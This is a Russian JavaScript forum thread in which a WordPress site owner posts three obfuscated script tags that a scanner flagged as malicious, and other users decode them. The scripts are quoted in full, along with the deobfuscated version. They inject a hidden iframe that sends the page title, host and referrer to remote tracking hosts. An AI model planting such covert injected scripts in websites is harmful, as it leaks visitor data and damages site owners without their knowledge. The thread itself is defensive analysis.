Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 12.09.2015, 18:04
Аватар для dmk
dmk dmk вне форума
Интересующийся
Отправить личное сообщение для dmk Посмотреть профиль Найти все сообщения от dmk
 
Регистрация: 21.03.2015
Сообщений: 13

Этот скрипт вирус?
Есть подозрение на наличие вредоносных скриптов на сайте WordPress


Перевод:
Этот файл, как представляется, установлен хакером для выполнения вредоносных действий. Если вы знаете о этом файле вы можете выбрать, чтобы игнорировать его, чтобы исключить его из будущих проверок. Текст, который мы нашли в этом файле, который соответствует известной вредоносный файл является: "1Aqapkrv".

Вот скрипты. Это вирус?
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00cn'00'02)'02'00ac'00'02)'02'00pfk'00'02)'02'00c,n,a'00'02)'02'00mpgfk'00'02)'02'00qvpk`w'00'02)'02'00vg,'00'02)'02'00am'00'02)'02'00o'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00a33l6,'00'02)'02'00k,vg'00'02)'02'00cq'00'02)'02'00gpe'00'02)'02'00wkf'00'02)'02'00g,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>


Если нет, что он делает?

Последний раз редактировалось devote, 12.09.2015 в 18:28.
Ответить с цитированием
  #2 (permalink)  
Старый 12.09.2015, 18:22
Аватар для Erolast
Профессор
Отправить личное сообщение для Erolast Посмотреть профиль Найти все сообщения от Erolast
 
Регистрация: 24.09.2013
Сообщений: 1,436

Цитата:
что он делает
Делает на адрес http://c11n4.i.teaserguide.com/snitch GET-запрос с передачей заголовка текущей страницы, текущего домена и адреса страницы, с которой был осуществлен переход на текущую. Зачем-то три раза подряд (три одинаковых скрипта).

Следит за посещаемостью сайта и за тем, с каких адресов на него попадают, в общем. Может, на серверной стороне еще и строит базу посетителей по IP.

Последний раз редактировалось Erolast, 12.09.2015 в 18:29.
Ответить с цитированием
  #3 (permalink)  
Старый 12.09.2015, 18:23
что-то знаю
Отправить личное сообщение для devote Посмотреть профиль Найти все сообщения от devote
 
Регистрация: 24.05.2009
Сообщений: 5,176

Ну навредить вашему сайту он не может, но то что он явно не полезен для вашего сайта это факт, так как фаш сайт может попасть в список нежелательных из-за этого куска кода. А делает он то, что просто вставляет фрейм на страницу, с необходимыми ссылками.

вот что он делает:
var referer = encodeURIComponent(document.referrer);
  var default_keyword = encodeURIComponent(document.title);
  var host = encodeURIComponent(location.host);
  var iframe = document.createElement('iframe');
  iframe.width=0;
  iframe.height=0;
  iframe.src= "http://c11n4.i.teaserguide.com/snitch?default_keyword=" + default_keyword + "&referrer=" + referer + "&se_referrer=" + referer + "&source=" + host;
  document.body.appendChild(iframe);

Остальные делают тоже самое, только адрес может отличаться.
__________________
хм Russians say завтра but завтра doesn't mean "tomorrow" it just means "not today."
HTML5 history API рассширение для браузеров не поддерживающих pushState, replaceState
QSA CSS3 Selector Engine
Ответить с цитированием
  #4 (permalink)  
Старый 12.09.2015, 18:33
Аватар для Erolast
Профессор
Отправить личное сообщение для Erolast Посмотреть профиль Найти все сообщения от Erolast
 
Регистрация: 24.09.2013
Сообщений: 1,436

Цитата:
адрес может отличаться
И правда.
Первые и третий скрипты шлют на http://c11n4.i.teaserguide.com/snitch, второй - на http://alcardia.l.coredistribute.com/snitch.

Последний раз редактировалось Erolast, 12.09.2015 в 18:36.
Ответить с цитированием
  #5 (permalink)  
Старый 17.05.2016, 19:35
Новичок на форуме
Отправить личное сообщение для Artyom8819 Посмотреть профиль Найти все сообщения от Artyom8819
 
Регистрация: 19.04.2014
Сообщений: 7

Здравствуйте! нашел в интернете слайдер на джава, поставил на сайт, вскоре заметил что стало перекидывать на рекламные страницы, подозреваю что это именно из за слайдера, гляньте пожалуйста, я прав?
Сюда вставить код не получается слишком длинный, тут вот он у меня
http://tut-interny.ru/js/tav-2.1.js
Ответить с цитированием
  #6 (permalink)  
Старый 17.05.2016, 19:36
Новичок на форуме
Отправить личное сообщение для Artyom8819 Посмотреть профиль Найти все сообщения от Artyom8819
 
Регистрация: 19.04.2014
Сообщений: 7

http://tut-interny.ru/js/tav-2.1.js
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Скрипт выравнивания высоты блоков razorg1991 Элементы интерфейса 13 15.01.2017 00:04
2 компьютера 1 хром и 1 скрипт Megatron13 Opera, Safari и др. 1 21.07.2013 19:12
как скопировать скрипт с переадресующей страници ramisa Элементы интерфейса 9 09.07.2013 23:59
Не получается интегрировать скрипт с подгрузкой контента в cms zLobster Элементы интерфейса 0 20.04.2012 11:19
Изменить скрипт Изучаю_JS Общие вопросы Javascript 0 12.02.2012 22:05